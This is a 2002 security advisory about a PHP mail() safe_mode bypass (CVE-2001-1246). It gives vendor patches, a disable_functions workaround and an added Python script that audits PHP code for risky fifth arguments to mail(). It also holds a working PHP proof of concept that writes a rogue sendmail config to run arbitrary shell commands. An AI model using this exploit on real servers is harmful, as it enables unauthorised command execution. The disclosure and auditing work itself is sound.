PHP mail() Function safe_mode Restriction Bypass Command Execution Vulnerability
Published: 2002-08-23
Updated: 2002-08-27
Affected systems:
PHP PHP 4.2.2
PHP PHP 4.2.1
PHP PHP 4.2.0
PHP PHP 4.1.2
PHP PHP 4.1.1
PHP PHP 4.1.0
PHP PHP 4.1
PHP PHP 4.0.7
PHP PHP 4.0.6
PHP PHP 4.0.5
Description:
BUGTRAQ ID: 2954
CVE(CAN) ID: CVE-2001-1246
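PHP is a popular server-side web programming language. It is powerful and easy to use, is installed by default on many Unix operating systems, and also runs on Windows.
The fifth parameter of PHP's mail() function is vulnerable. A remote attacker may be able to use this flaw, in combination with a vulnerability in a CGI script, to bypass PHP's safe_mode restrictions and execute system commands.
The fifth parameter of mail() was introduced in PHP-4.0.5. Last year it was found that this parameter did not properly filter shell characters, which made it possible to bypass safe_mode restrictions and execute system commands ( http://www.nsfocus.com/index.php?act=sec_bug&do=view&bug_id=1593 ). That vulnerability was fixed in PHP-4.0.6.
However, PHP's mail() function is still vulnerable. The fifth parameter lets the caller pass additional options to the MTA when sending mail (the MTA is set by sendmail_path in php.ini and defaults to sendmail). sendmail's -Cfile option selects a different configuration file, and a sendmail configuration file can specify commands to execute, so mail() can be used to bypass safe_mode restrictions and execute arbitrary system commands.
<*Source: Wojciech Purczynski (cliph@isec.pl)
Links: http://marc.theaimsgroup.com/?l=bugtraq&m=103011916928204&w=2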
https://www.redhat.com/support/errata/RHSA-2002-102.html
http://www.debian.org/security/2002/dsa-168
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-059.php
*>
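Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!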
-----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----
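To reproduce the result, run the script in a PHP environment that uses sendmail and has safe_mode enabled. The PHP script must be owned by the same user that runs the web server; otherwise, under safe_mode, the mismatch between the owner of the script and the owner of the files it operates on causes a conflict.
Other commands can be used in place of rm -f $script $cf; or several commands can be appended after it, separated by semicolons.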
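Recommendations:
Temporary workarounds:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the risk:
* If other web users on your host can create PHP scripts, temporarily disable the mail function in php.ini:
disable_functions = mail
Then restart the web server.
* Rebuild PHP from the latest PHP CVS code.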
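Before disabling mail() on a shared host, it helps to know which hosted scripts pass a fifth argument at all. The following Python script is an added example, not part of the original advisory: it audits PHP source for mail() calls with five or more arguments and flags a literal -C option like the one described above. The function names and the sample source are constructed for illustration, and PHP comments are not stripped before matching.

```python
import re

# Start of a call to the global mail(), not $obj->mail(, Foo::mail( or my_mail(.
# PHP function names are case-insensitive.
CALL_RE = re.compile(r'(?<![\w>:$])mail\s*\(', re.IGNORECASE)
# A literal fifth argument that begins with sendmail's -C (alternate config file).
CONFIG_OPT_RE = re.compile(r'''^["']?\s*-C''')


def split_args(src, start):
    """Split the argument list starting just after '(' at index start.

    Quotes, backslash escapes and nested brackets are tracked so commas
    inside strings or inner calls do not split an argument.
    Returns the argument list, or None if the call is never closed.
    """
    args, cur, depth, quote = [], [], 0, None
    i = start
    while i < len(src):
        ch = src[i]
        if quote:
            cur.append(ch)
            if ch == '\\' and i + 1 < len(src):
                cur.append(src[i + 1])   # keep the escaped character
                i += 1
            elif ch == quote:
                quote = None
        elif ch in '"\'':
            quote = ch
            cur.append(ch)
        elif ch in '([{':
            depth += 1
            cur.append(ch)
        elif ch in ')]}':
            if depth == 0:               # closing paren of mail(...)
                args.append(''.join(cur).strip())
                return args
            depth -= 1
            cur.append(ch)
        elif ch == ',' and depth == 0:
            args.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    return None


def audit_mail_calls(src):
    """Return (line, level, fifth_argument) for each mail() call with 5+ args."""
    findings = []
    for m in CALL_RE.finditer(src):
        args = split_args(src, m.end())
        if args is None or len(args) < 5:
            continue
        fifth = args[4]
        line = src.count('\n', 0, m.start()) + 1
        if CONFIG_OPT_RE.match(fifth):
            level = 'high'     # literal -C: alternate sendmail configuration
        elif '$' in fifth:
            level = 'review'   # value built from a variable, inspect its source
        else:
            level = 'info'     # fixed string with no -C prefix
        findings.append((line, level, fifth))
    return findings


# Constructed sample source; line 4 is the call from the script shown above.
SAMPLE = r'''<?php
mail($to, $subject, $body);
mail($to, $subject, $body, "From: a@example.org", "-fbounce@example.org");
mail("nobody", "", "", "", "-C$cf");
mail($to, str_replace(",", " ", $s), $body, $hdrs, $extra);
$mailer->mail($a, $b, $c, $d, $e);
'''

if __name__ == '__main__':
    for line, level, fifth in audit_mail_calls(SAMPLE):
        print(f'line {line}: [{level}] fifth argument = {fifth}')
```

Any script reported as high or review should be examined before mail() is re-enabled for that user.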
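Vendor patches:
Debian
------
Debian has released a security advisory (DSA-168-1) and corresponding patches for this issue:
DSA-168-1:New PHP packages fix several vulnerabilities
Link: http://www.debian.org/security/2002/dsa-168
Patch downloads: see the advisory linked above for the package list and checksums.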
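Patch installation:
1. Installing the packages manually:
First, download the patch package with the following command:
# wget url (url is the patch download link)
Then install the patch with the following command:
# dpkg -i file.deb (file is the name of the corresponding patch package)
2. Installing the packages automatically with apt-get:
First, update the internal database with the following command:
# apt-get update
Then install the updated packages with the following command:
# apt-get upgrade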
MandrakeSoft
------------
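MandrakeSoft has released a security advisory (MDKSA-2002:059) and corresponding patches for this issue:
MDKSA-2002:059:php
Link: http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-059.php
Patch downloads: see the advisory linked above for the updated packages.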
The updated packages can also be downloaded from any of the mirror FTP servers listed at:
http://www.mandrakesecure.net/en/ftp.php
PHP
---
The vendor has released an upgrade that fixes this security issue. Download it from the vendor's home page:
http://www.php.net
RedHat
------
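RedHat has released a security advisory (RHSA-2002:102-26) and corresponding patches for this issue:
RHSA-2002:102-26:New PHP packages fix vulnerability in safemode
Link: https://www.redhat.com/support/errata/RHSA-2002-102.html
Patch downloads: see the advisory linked above for the updated packages.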